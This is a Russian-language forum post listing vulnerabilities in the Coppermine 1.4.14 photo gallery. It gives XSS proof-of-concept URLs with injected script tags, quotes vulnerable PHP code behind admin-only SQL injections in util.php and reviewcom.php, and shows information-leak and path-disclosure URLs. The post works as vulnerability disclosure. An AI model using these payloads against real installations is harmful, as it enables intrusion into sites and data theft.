Показать сообщение отдельно

  #10  
Старый 01.02.2008, 15:36
Аватар для iddqd
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию

XSS

Vulnerable: Coppermine 1.4.14

PoC:

Код:
http://localhost/coppermine.1.4.14/docs/showdoc.php? 
h=iddqd&t=<script>alert(123);</script> 
http://localhost/coppermine.1.4.14/docs/showdoc.php? 
h=</title><script>alert(123);</script>&t=iddqd
SQL injection in "util.php"

Vulnerable: Coppermine 1.4.14

Note: атакующий должен иметь привилегии администратора!

Уязвимый участок кода:

PHP код:

       global 
$CONFIG$lang_util_php

       
$albumid = (isset($_POST['albumid'])) ? $_POST['albumid'] : 0
       
$albstr = ($albumid) ? "WHERE aid = $albumid''

       
$updatetype $_POST['updatetype']; 
       
$numpics $_POST['numpics']; 
       
$startpic = (isset($_POST['startpic'])) ? $_POST['startpic'] : 0

       echo 
"<h2>{$lang_util_php['thumbs_wait']}</h2>"

       
$result cpg_db_query("SELECT * FROM {$CONFIG['TABLE_PICTURES']} 
$albstr LIMIT $startpic$numpics"); 
       
$count mysql_num_rows($result); 
Как видно, переменные "$_POST['albumid']", "$_POST['startpic']" и "$_POST['numpics']" имеют недостаточную фильтрацию, что дает возможность администратору провести SQL инъекцию.

SQL injection in "reviewcom.php"

Vulnerable: Coppermine 1.4.14

Note: атакующий должен иметь привилегии администратора!

Уязвимый участок кода:

PHP код:
if (isset($_POST['cid_array'])) { 
   
$cid_array $_POST['cid_array']; 
   
$cid_set ''
   foreach (
$cid_array as $cid
   
$cid_set .= ($cid_set == '') ? '(' $cid ', ' $cid
   
$cid_set .= ')'

   
cpg_db_query("DELETE FROM {$CONFIG['TABLE_COMMENTS']} 
WHERE msg_id IN 
$cid_set"); 
   
$nb_com_del mysql_affected_rows(); 

Данные не фильтруются в переменной "$_POST['cid_array']" и используются в запросе DELETE.
При MySQL 4.1.x администратору может получить информацию из БД приложения, используя подзапросы в DELETE.

Утечка информации из "update.php"

Vulnerable: Coppermine 1.4.14

PoC:

Код:
http://victim.com/cpg14x/update.php
Скрипт может выдать некоторую информацию, например, префикс таблиц в БД, что может быть использовано в последующих атаках.

Раскрытие пути в "include/slideshow.inc.php"

Vulnerable: Coppermine 1.4.14

PoC:

Код:
http://localhost/coppermine.1.4.14/include/slideshow.inc.php
Выдает ошибку, содержащую абсолютный путь к скрипту:

Код HTML:
<b>Fatal error</b>:  Call to undefined function  get_pic_data() in <b> 
C:\apache_wwwroot\coppermine.1.4.14\include\slideshow.inc.php 
</b> on line <b>53</b><br />
 
Ответить с цитированием